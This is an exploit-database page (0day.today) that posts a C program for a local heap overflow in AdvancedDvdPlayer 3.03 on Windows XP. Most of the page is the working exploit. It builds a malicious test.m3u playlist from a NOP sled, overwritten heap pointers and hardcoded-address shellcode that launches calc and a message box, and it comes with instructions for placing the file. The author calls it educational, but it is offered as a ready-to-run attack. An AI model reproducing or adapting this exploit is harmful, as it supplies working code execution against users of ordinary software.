[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

AdvancedDvdPlayer Local Exploit

Author
GoTr00t
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-17193
Category
local exploits
Date add
01-10-2011
Platform
windows
/*
  Not so usual exploit method 
  Local Heapoverflow exploit
  An Advanced Exploit For An AdvancedDvdPlayer ;)
  02-10-2011
  
  AdvancedDvdPlayer 3.03
  Download Link : http://download.cnet.com/Advanced-DVD-Player/3000-2139_4-10310889.html?tag=mncol;3
  Tested on WinXP SP3
  
  Compile and make a playlist and name it test.m3u, then run this en put the new test.m3u in de 
  \Program Files\AdvancedDVDPlayer folder then run 
  
  Old application but i wanna show this way of exploitation for educational purpose.
  
  Owned by GoTr00t!
  mail:aksuumit[AT]hotmail.com
  
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>



char scode_calc[] =    "\x33\xDB" // xor EBX,EBX
                       "\x33\xD2" // xor EDX,EDX
                       "\x33\xFF" // XOR EDI,EDI
                       "\x33\xF6" // XOR ESI,ESI 
                       "\x33\xC0\x50\x68\x43\x41\x4C\x43"  
                       "\x8B\xCC\x51\xE8\x10\x92\x53\x76"; // Hardcoded shellcode addresses!

int main(){
    
    char exploit[1000];
    char NOPS[303];
    memset(NOPS,0x90,sizeof(NOPS));
    
    char shellcode[] = "\x33\xc0\x50\x68\xA0\xA0\xA0\x41"
                       "\x68\x57\x4E\x45\x44\x68\x52\x45\xA0\x4F"
                       "\x68\x4F\x55\xA0\x41\x68\xA0\xA0\xA0\x59"
                       "\x8B\xCC\x50\x51\x51\x50\xE8\xFD\x05\xd6\x7c"; // hardcoded addressed!

    // 016F018C pointer to the pointer
    char EAX[] = "\x8C\x01\x6F\x01";
    
    strcat(exploit,"1\n");
    strcat(exploit,NOPS);
    strcat(exploit,"\x90"); // strange but without it my compiler wont compile it good ?
    strcat(exploit,EAX);
    strcat(exploit,"\x6C\x01\x6F\x01");       ////// 016F016C pointer to the actual call address      
    strcat(exploit,"\x94\x01\x6F\x01");       //// 016F0194
    strcat(exploit,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");
    strcat(exploit,scode_calc);
    strcat(exploit,"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90");
    strcat(exploit,shellcode);
    strcat(exploit,".mpg\n");

    FILE *fp;
    fp=fopen("test.m3u","w");
    
    fprintf(fp,exploit);
    fclose(fp);
    
    return 0;    
}




#  0day.today [2024-12-25]  #